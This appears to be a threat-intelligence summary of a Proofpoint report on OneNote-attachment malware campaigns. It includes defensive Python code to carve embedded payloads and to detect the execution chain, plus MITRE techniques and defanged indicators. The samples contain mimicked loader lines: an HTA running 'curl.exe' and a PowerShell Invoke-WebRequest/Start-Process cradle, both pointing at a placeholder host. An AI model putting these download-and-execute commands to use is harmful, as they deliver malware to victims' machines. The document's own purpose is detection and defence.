Proofpoint researchers report a rising trend of malware delivery via OneNote (.one) attachments in email campaigns observed from December 2022 to January 2023, spanning multiple threat actors and ranging from targeted to broad distribution. Nothing executes until the end user interacts with the embedded OneNote content; payloads include AsyncRAT, Redline, Qbot, and DOUBLEBACK, and the campaigns affected organizations globally, including in North America and Europe.
#TA577 #TA579 #OneNote #AsyncRAT #Qbot #Redline #AgentTesla #DOUBLEBACK #XWorm #QuasarRAT #Netwire
Keypoints
- The use of OneNote (.one) documents to deliver malware via email is increasing.
- Multiple cybercriminal threat actors are using OneNote documents to deliver malware.
- Campaigns range from targeted to broad, with thousands of messages across industries.
- Payloads include AsyncRAT, Redline, AgentTesla, Quasar RAT, XWorm, Netwire, DOUBLEBACK, and Qbot; TA577 delivered Qbot via OneNote at the end of January 2023.
- End users must interact with embedded content (e.g., double-click) to detonate the payload.
- Microsoft's 2022 change to block VBA macros by default in Office files downloaded from the internet pushed actors to diversify attachment types and techniques; OneNote attachments often evade some antivirus detections.
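The chain described in the key points (an embedded file hidden behind a button-like graphic, detonated only when the user double-clicks it) can be triaged without opening the document, because OneNote stores each attachment as a FileDataStoreObject structure defined in MS-ONESTORE. The script below is an added example, not Proofpoint's or Microsoft's code: it carves those structures out of a .one file and classifies each payload by content. The bytes it scans are constructed inline (a .one signature, a PNG stand-in for the button graphic, and an HTA that mimics the curl-based loader the report describes); the type heuristics and the "suspicious" threshold are the author's assumptions, not a vendor detection.

```python
"""Carve and classify files embedded in a OneNote (.one) document.

Added example, not Proofpoint's or Microsoft's code. OneNote stores an
attachment as a FileDataStoreObject (MS-ONESTORE): header GUID, 8-byte
little-endian length, 4 unused + 8 reserved bytes, the raw file, footer
GUID. Carving these surfaces the .hta/.vbs/.lnk/.bat hidden behind a
"double click to view" graphic without opening the document.
"""
import struct

# .one file signature, GUID {7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}, little-endian bytes
ONE_FILE_GUID = bytes.fromhex("e4525c7b8cd8a74daeb15378d02996d3")
# FileDataStoreObject header {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and
# footer {71FBA722-0F79-4A0B-BB13-899256426B24}, little-endian bytes
FDSO_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FDSO_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8              # guidHeader + cbLength + unused + reserved
LNK_MAGIC = bytes.fromhex("4c00000001140200")  # HeaderSize 0x4C + start of LinkCLSID
# Types treated as inert; everything else is flagged for review (an assumption).
BENIGN = {"PNG image", "JPEG image", "PDF document"}


def is_onenote(data: bytes) -> bool:
    return data.startswith(ONE_FILE_GUID)


def extract_embedded_files(data: bytes) -> list:
    """Return [(offset, payload), ...] for every FileDataStoreObject in data."""
    found = []
    pos = data.find(FDSO_HEADER)
    while pos != -1:
        if pos + FDSO_DATA_OFFSET > len(data):
            break
        (cb_length,) = struct.unpack_from("<Q", data, pos + 16)
        start = pos + FDSO_DATA_OFFSET
        end = start + cb_length
        if end > len(data):   # truncated file or bogus length: stop rather than over-read
            break
        found.append((pos, data[start:end]))
        pos = data.find(FDSO_HEADER, end)
    return found


def classify(payload: bytes) -> str:
    """Magic bytes first, then keyword heuristics for script payloads."""
    if payload.startswith(b"MZ"):
        return "PE executable"
    if payload.startswith(LNK_MAGIC):
        return "Windows shortcut (LNK)"
    if payload.startswith(b"\x89PNG\r\n\x1a\n"):
        return "PNG image"
    if payload.startswith(b"\xff\xd8\xff"):
        return "JPEG image"
    if payload.startswith(b"%PDF"):
        return "PDF document"
    # Strip NULs so UTF-16LE scripts collapse to their ASCII text before matching.
    text = payload.decode("latin-1").replace("\x00", "").lower()
    if "<hta:application" in text or "<script" in text or "<html" in text:
        return "HTA/HTML script"
    if "wscript.shell" in text or "createobject(" in text:
        return "VBScript"
    if text.lstrip().startswith("@echo off") or "powershell" in text or "cmd /c" in text:
        return "Batch/command script"
    return "unknown"


def triage(data: bytes) -> list:
    """One dict per embedded file; 'suspicious' is True for anything not in BENIGN."""
    report = []
    for offset, payload in extract_embedded_files(data):
        kind = classify(payload)
        report.append({"offset": offset, "size": len(payload), "type": kind,
                       "suspicious": kind not in BENIGN})
    return report


def build_fdso(payload: bytes) -> bytes:
    """Serialize one FileDataStoreObject; only used to construct the sample below."""
    return FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12 + payload + FDSO_FOOTER


# Constructed sample, not a real .one file: signature, padding, a PNG stand-in
# for the button graphic, then an HTA that mimics the curl-based loader.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_HTA = (b'<html><hta:application id="app"/><script language="VBScript">\r\n'
              b'Set sh = CreateObject("WScript.Shell")\r\n'
              b'sh.Run "cmd /c curl.exe -o C:\\ProgramData\\w.dll http://example.invalid/q", 0\r\n'
              b'</script></html>')
SAMPLE_ONE = (ONE_FILE_GUID + b"\x00" * 64 + build_fdso(SAMPLE_PNG)
              + b"\x00" * 16 + build_fdso(SAMPLE_HTA))

if __name__ == "__main__":
    if not is_onenote(SAMPLE_ONE):
        print("warning: input does not carry the .one file signature")
    for row in triage(SAMPLE_ONE):
        print(f"offset={row['offset']:#x} size={row['size']} type={row['type']} "
              f"{'SUSPICIOUS' if row['suspicious'] else 'ok'}")
```

Run it against a real attachment by replacing SAMPLE_ONE with the file's bytes. Stopping at the first length field that overruns the buffer is deliberate: a crafted length must not turn the triage tool itself into an over-read, and a truncated attachment is worth a manual look anyway.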
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – Malware is delivered as a OneNote document attached to email, using invoice, remittance, and shipping lures. “The OneNote documents contain embedded files, often hidden behind a graphic that looks like a button. When the user double clicks the embedded file, they will be prompted with a warning.”
- [T1204.002] User Execution: Malicious File – Nothing runs until the user double-clicks the embedded file and accepts the warning; the embedded file may be an HTA, a script, a batch file, an executable, or a shortcut (“shortcut (LNK) files” are listed among the possible payloads). “If the user double clicked the file… the file will execute.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell downloads and launches the payload (Invoke-WebRequest to fetch a binary, Start-Process to run it). “oShell.Run ‘cmd /c powershell Invoke-WebRequest -Uri …; PowerShell Start-Process -Filepath …’”
- [T1105] Ingress Tool Transfer – Payloads are fetched from remote URLs by PowerShell or curl.exe. “Invoke-WebRequest -Uri … -OutFile …”
- [T1218.005] System Binary Proxy Execution: Mshta – HTA files, which Windows runs through mshta.exe, download and execute payloads such as the Qbot DLL. “HTA uses ‘curl.exe’ to download the Qbot DLL, and run it with the function, ‘Wind’.”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript in the downloaded content (e.g., JnNNj3.vbs) executes the payload. “The VBS would be fully executed.”
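The behaviour quoted in the technique list (OneNote spawning cmd.exe, PowerShell running Invoke-WebRequest followed by Start-Process, an .hta launched from the user's temp directory) is easier to detect on the endpoint than the attachment itself, and the detection survives a change of lure or file type. The following rule evaluator is an added example, not Proofpoint's code, run over constructed Sysmon-like process-creation events. The field names, the script-host list and the regexes are the author's assumptions; so is the Temp\OneNote path condition, which reflects where OneNote unpacks a double-clicked attachment and should be verified against your own telemetry before deployment.

```python
"""Detect the OneNote detonation chain from process-creation telemetry.

Added example, not Proofpoint's code. Three rules over constructed,
Sysmon-like events: OneNote spawning a script host, a PowerShell/curl
download cradle, and a script host running a file from OneNote's temp
export directory. Field names, host list and regexes are assumptions.
"""
import re

# Children of ONENOTE.EXE that have no legitimate reason to appear in most fleets.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "curl.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
# Download primitives from the quoted command lines plus common variants.
CRADLE_RE = re.compile(r"invoke-webrequest|\biwr\b|\bcurl(\.exe)?\b|downloadstring|downloadfile", re.I)
# Something that runs what was just downloaded.
EXEC_RE = re.compile(r"start-process|invoke-expression|\biex\b|rundll32|regsvr32", re.I)
# Assumption: OneNote unpacks a double-clicked attachment under %LOCALAPPDATA%\Temp\OneNote\...
ONENOTE_TEMP_RE = re.compile(r"\\temp\\onenote\\", re.I)
SEVERITY = {"medium": 1, "high": 2}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return [(rule_name, severity), ...] for one process-creation event."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmd = event["command_line"]
    hits = []
    if parent == "onenote.exe" and child in SCRIPT_HOSTS:
        hits.append(("onenote_spawns_script_host", "high"))
    downloads = CRADLE_RE.search(cmd) is not None
    if downloads and EXEC_RE.search(cmd):
        hits.append(("download_then_execute_cradle", "high"))
    elif downloads:
        hits.append(("download_cradle", "medium"))
    if child in SCRIPT_HOSTS and ONENOTE_TEMP_RE.search(cmd):
        hits.append(("script_host_runs_onenote_export", "high"))
    return hits


def triage(events: list) -> dict:
    """Map event id -> (max severity, sorted rule names) for every event that fired."""
    out = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            sev = max((s for _, s in hits), key=SEVERITY.__getitem__)
            out[ev["id"]] = (sev, sorted(r for r, _ in hits))
    return out


# Constructed events, not real telemetry. e1 and e2 mirror the report's chains;
# e3 and e4 are benign noise; e5 is a download cradle with no OneNote parent.
ONENOTE = r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE"
EVENTS = [
    {"id": "e1", "parent_image": ONENOTE, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": (r"cmd /c powershell Invoke-WebRequest -Uri http://example.invalid/Excel.exe "
                      r"-OutFile C:\Users\Public\Excel.exe; PowerShell Start-Process "
                      r"-Filepath C:\Users\Public\Excel.exe")},
    {"id": "e2", "parent_image": ONENOTE, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": (r'"C:\Windows\System32\mshta.exe" "C:\Users\u\AppData\Local\Temp\OneNote'
                      r'\16.0\Exported\{GUID}\NT\0\attachment.hta"')},
    {"id": "e3", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -NoProfile Get-ChildItem C:\Users"},
    {"id": "e4", "parent_image": ONENOTE, "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},
    {"id": "e5", "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -o C:\Users\u\Downloads\tool.zip https://example.invalid/tool.zip"},
]

if __name__ == "__main__":
    for eid, (sev, rules) in triage(EVENTS).items():
        print(f"{eid}: {sev.upper()} {', '.join(rules)}")
```

The parent/child rule is the one worth deploying first: it does not depend on the payload type, so it still fires when the actor swaps the .hta for a .vbs or .lnk, while the cradle rule on its own produces medium-severity noise from legitimate curl and PowerShell use (event e5) that needs the OneNote context to become actionable.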
Indicators of Compromise
- [URL] – AsyncRAT/other payload delivery URLs – hxxps[:]//files.catbox[.]moe/rltrtq.bat, hxxps[:]//3.101.39[.]145/Excel.exe, hxxps[:]//www.onenotegem[.]com/uploads/soft/one-templates/four-quadrant.one (and 2 more URLs)
- [IP] – AsyncRAT C2 addresses – 209.126.83[.]213, 154.12.234[.]207, 212.193.30[.]230:3345 (and other listed C2s)
- [SHA256] – OneNote Attachment hashes – e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27, 75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a (and 2 more hashes)
- [Domain] – Domains observed hosting payloads or files in the delivery chain – direct-trojan[.]com, onenotegem[.]com, www.onenotegem[.]com
- [File name] – Embedded/attached files used to deliver payloads – attachment.hta, four-quadrant.one, Invoice.one, Weekly_assignments.one (and 2 more file names)